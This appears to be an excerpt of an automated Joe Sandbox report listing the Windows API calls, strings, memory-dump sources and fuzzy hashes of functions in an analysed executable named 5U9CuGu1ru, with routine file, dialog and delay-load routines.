              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: b5557b971153d8ffbf91406c9bc8f338b72fdf27cceabf0a27f47a2741230f01
              • Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
              • Opcode Fuzzy Hash: b5557b971153d8ffbf91406c9bc8f338b72fdf27cceabf0a27f47a2741230f01
              • Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: e42b1ca304d44bf8a8fd7f4ba68aa7a738a740a6a9f6c4d51af8c11ef72594b3
              • Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
              • Opcode Fuzzy Hash: e42b1ca304d44bf8a8fd7f4ba68aa7a738a740a6a9f6c4d51af8c11ef72594b3
              • Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DAB2
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 8a4f28fa1e4940f69175730398f95fb7f8c643df0c0b4770cc1ae0523a3fc8d2
              • Instruction ID: 06f9fefc21d725cc01218839a8c49c5bb7af5885a4e86ae025b83cc8efe27696
              • Opcode Fuzzy Hash: 8a4f28fa1e4940f69175730398f95fb7f8c643df0c0b4770cc1ae0523a3fc8d2
              • Instruction Fuzzy Hash: 9FA012D116C2027C300871016C12E7B030CECC0B50330450AB007C0044584408850431
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 7db20307ec2640d0a06d8dc8ddb857fc391fa6cd441f003f12532e921ff22a51
              • Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
              • Opcode Fuzzy Hash: 7db20307ec2640d0a06d8dc8ddb857fc391fa6cd441f003f12532e921ff22a51
              • Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: aab982495af112fecce1bc3f266c5b91910e2298dfd6bf27ace2e9005aa814c2
              • Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
              • Opcode Fuzzy Hash: aab982495af112fecce1bc3f266c5b91910e2298dfd6bf27ace2e9005aa814c2
              • Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: 0fda897ef53cbf6c253b58a8a926551b7d99e08766bc42d69a38821c7110ecb1
              • Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
              • Opcode Fuzzy Hash: 0fda897ef53cbf6c253b58a8a926551b7d99e08766bc42d69a38821c7110ecb1
              • Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DBD5
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c4cb9cb75098e70b6808507bddcc71991a7b73d90ea42dd74734b68370c798f3
              • Instruction ID: 81cece396e7cd67cba47b28581ac43bd26647c1addd223b224e4649f87a013e0
              • Opcode Fuzzy Hash: c4cb9cb75098e70b6808507bddcc71991a7b73d90ea42dd74734b68370c798f3
              • Instruction Fuzzy Hash: F3A011EA2AC20ABC300822082C0BEBA022CF8C0B30330880AB20BC0080AE800C8A0032
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DC36
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: a88b2df5f833859019ac45a3dd9cd25266bb86985f85c550b178bd466297e692
              • Instruction ID: 57f41c657e1864891426987e2927ac24cdb6d719cc6b288233853370d5b2feaa
              • Opcode Fuzzy Hash: a88b2df5f833859019ac45a3dd9cd25266bb86985f85c550b178bd466297e692
              • Instruction Fuzzy Hash: A9A012D616C302BC700C21042C02FB6021CE8C0B103304C09B10BD014059842C854471
              APIs
              • ___delayLoadHelper2@8.DELAYIMP ref: 0081DC36
                • Part of subcall function 0081DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0081DFD6
                • Part of subcall function 0081DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0081DFE7
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
              • String ID:
              • API String ID: 1269201914-0
              • Opcode ID: c3a1ee0fa3f50f925c29e869d4a56d59bbae8abc9c55ff48274cc23ce1ddf8c5
              • Instruction ID: 57f41c657e1864891426987e2927ac24cdb6d719cc6b288233853370d5b2feaa
              • Opcode Fuzzy Hash: c3a1ee0fa3f50f925c29e869d4a56d59bbae8abc9c55ff48274cc23ce1ddf8c5
              • Instruction Fuzzy Hash: A9A012D616C302BC700C21042C02FB6021CE8C0B103304C09B10BD014059842C854471
              APIs
              • SetEndOfFile.KERNELBASE(?,00809104,?,?,-00001964), ref: 00809EC2
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: File
              • String ID:
              • API String ID: 749574446-0
              • Opcode ID: 2eb6dfb2f235b161e11609f6572db7bcceca6b1ce300fdca1ee1a3e47d4b43d9
              • Instruction ID: 8cb697f7e5434d69b096592c94367a0ee964a06597d4a86d874991028e098f8d
              • Opcode Fuzzy Hash: 2eb6dfb2f235b161e11609f6572db7bcceca6b1ce300fdca1ee1a3e47d4b43d9
              • Instruction Fuzzy Hash: 99B011300A880A8B8E002B30CE288283A20FAA230A3008AA0A002CA0A0CB22C002AA00
              APIs
              • SetCurrentDirectoryW.KERNELBASE(?,0081A587,C:\Users\user\Desktop,00000000,0084946A,00000006), ref: 0081A326
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CurrentDirectory
              • String ID:
              • API String ID: 1611563598-0
              • Opcode ID: 03f6d92d9320daa0db9255ed4ddbf1e05c573880988983a36da74f57bca4e000
              • Instruction ID: e771cdcf5cc482c18546f4e94e7b00ba62b71e732c28d8e541797c79b3478e8b
              • Opcode Fuzzy Hash: 03f6d92d9320daa0db9255ed4ddbf1e05c573880988983a36da74f57bca4e000
              • Instruction Fuzzy Hash: 2AA011302A800AAA8E000B30CC0AC2ABAA0ABA0B03F008A20B002C00A0CB30C828AA00
              APIs
              • CloseHandle.KERNELBASE(000000FF,?,?,0080968F,?,?,?,?,00831FA1,000000FF), ref: 008096EB
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CloseHandle
              • String ID:
              • API String ID: 2962429428-0
              • Opcode ID: afb964c4ce8ca0e600f7a66fbced791d2867ba01d37450e31d36e8f93682c731
              • Instruction ID: 6c7e0809de8d8a2ba012e1ae1c35fdc616627834edad42eb226a353dcf75bf8b
              • Opcode Fuzzy Hash: afb964c4ce8ca0e600f7a66fbced791d2867ba01d37450e31d36e8f93682c731
              • Instruction Fuzzy Hash: F1F0BE31446B048FDB308E24C9A8792B7E4FB22325F048B1EC1FB834E1A762684D8F00
              APIs
                • Part of subcall function 0080130B: GetDlgItem.USER32(00000000,00003021), ref: 0080134F
                • Part of subcall function 0080130B: SetWindowTextW.USER32(00000000,008335B4), ref: 00801365
              • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 0081B971
              • EndDialog.USER32(?,00000006), ref: 0081B984
              • GetDlgItem.USER32(?,0000006C), ref: 0081B9A0
              • SetFocus.USER32(00000000), ref: 0081B9A7
              • SetDlgItemTextW.USER32(?,00000065,?), ref: 0081B9E1
              • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 0081BA18
              • FindFirstFileW.KERNEL32(?,?), ref: 0081BA2E
              • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0081BA4C
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0081BA5C
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0081BA78
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0081BA94
              • _swprintf.LIBCMT ref: 0081BAC4
                • Part of subcall function 0080400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0080401D
              • SetDlgItemTextW.USER32(?,0000006A,?), ref: 0081BAD7
              • FindClose.KERNEL32(00000000), ref: 0081BADE
              • _swprintf.LIBCMT ref: 0081BB37
              • SetDlgItemTextW.USER32(?,00000068,?), ref: 0081BB4A
              • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 0081BB67
              • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 0081BB87
              • FileTimeToSystemTime.KERNEL32(?,?), ref: 0081BB97
              • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 0081BBB1
              • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 0081BBC9
              • _swprintf.LIBCMT ref: 0081BBF5
              • SetDlgItemTextW.USER32(?,0000006B,?), ref: 0081BC08
              • _swprintf.LIBCMT ref: 0081BC5C
              • SetDlgItemTextW.USER32(?,00000069,?), ref: 0081BC6F
                • Part of subcall function 0081A63C: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0081A662
                • Part of subcall function 0081A63C: GetNumberFormatW.KERNEL32(00000400,00000000,?,0083E600,?,?), ref: 0081A6B1
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
              • String ID: %s %s$%s %s %s$REPLACEFILEDLG
              • API String ID: 797121971-1840816070
              • Opcode ID: c24ef00b9a6edc5168b39a59eb6b01ed361145e09a3c98592d8d7448d2fd651c
              • Instruction ID: 17921e77bb875a2889c7157b32660a54d6c47cf408d35a480c535940a13bd12e
              • Opcode Fuzzy Hash: c24ef00b9a6edc5168b39a59eb6b01ed361145e09a3c98592d8d7448d2fd651c
              • Instruction Fuzzy Hash: AE91A4B2248348BBD621DBA4DC49FFB77ACFF89704F040819F749D2091DB75A6458762
              APIs
              • __EH_prolog.LIBCMT ref: 00807191
              • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,00000001), ref: 008072F1
              • CloseHandle.KERNEL32(00000000), ref: 00807301
                • Part of subcall function 00807BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00807C04
                • Part of subcall function 00807BF5: GetLastError.KERNEL32 ref: 00807C4A
                • Part of subcall function 00807BF5: CloseHandle.KERNEL32(?), ref: 00807C59
              • CreateDirectoryW.KERNEL32(?,00000000,?,00000001), ref: 0080730C
              • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 0080741A
              • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 00807446
              • CloseHandle.KERNEL32(?), ref: 00807457
              • GetLastError.KERNEL32 ref: 00807467
              • RemoveDirectoryW.KERNEL32(?), ref: 008074B3
              • DeleteFileW.KERNEL32(?), ref: 008074DB
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: CloseCreateFileHandle$DirectoryErrorLast$ControlCurrentDeleteDeviceH_prologProcessRemove
              • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
              • API String ID: 3935142422-3508440684
              • Opcode ID: 0ac464b59afaadf1ade63080fec63ef271104e824220cd26447dd5a6d5fa32cf
              • Instruction ID: 2eb63c3f2953240c70a80e7646b4f6ad6cc69c588209acb5ae17fd5e48071613
              • Opcode Fuzzy Hash: 0ac464b59afaadf1ade63080fec63ef271104e824220cd26447dd5a6d5fa32cf
              • Instruction Fuzzy Hash: CBB1D271D04615AADF21DFA4DC45BEE77B8FF44300F004469FA49E7282D734AA89CBA1
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: H_prolog_memcmp
              • String ID: CMT$h%u$hc%u
              • API String ID: 3004599000-3282847064
              • Opcode ID: 91f80f972d0113b7519209d5c524f050585e462f5596e8d962315417a9695fcf
              • Instruction ID: 4ed95a7648bdc3e2ccda50176e8d34e4dab2ded572283c9decb9903789912a61
              • Opcode Fuzzy Hash: 91f80f972d0113b7519209d5c524f050585e462f5596e8d962315417a9695fcf
              • Instruction Fuzzy Hash: 1A327C716106849BDF54DF28CC95AEA37A9FF55300F04457EFD8ACB2C2DA70AA48CB61
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
              • Associated: 00000000.00000002.2052764716.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052835974.0000000000833000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.000000000083E000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000844000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052868036.0000000000861000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.2052968649.0000000000862000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_800000_5U9CuGu1ru.jbxd
              Similarity
              • API ID: __floor_pentium4
              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
              • API String ID: 4168288129-2761157908
              • Opcode ID: 40ee13789b050ce96c4340b429363db6ccbf38d49c318d3d507f4ddad38abe70
              • Instruction ID: c1a5511ce5f13793c97c8a1fd36396d599efc3c59c6239c70c4d5a6e5d70cd34
              • Opcode Fuzzy Hash: 40ee13789b050ce96c4340b429363db6ccbf38d49c318d3d507f4ddad38abe70
              • Instruction Fuzzy Hash: 2FC22872E086288FDB25CE28AD447E9B7B5FB84315F1541EAD84EE7240E774AEC18F44
              APIs
              • __EH_prolog.LIBCMT ref: 008027F1
              • _strlen.LIBCMT ref: 00802D7F
                • Part of subcall function 0081137A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0080B652,00000000,?,?,?,00010450), ref: 00811396
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00802EE0
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2052792493.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
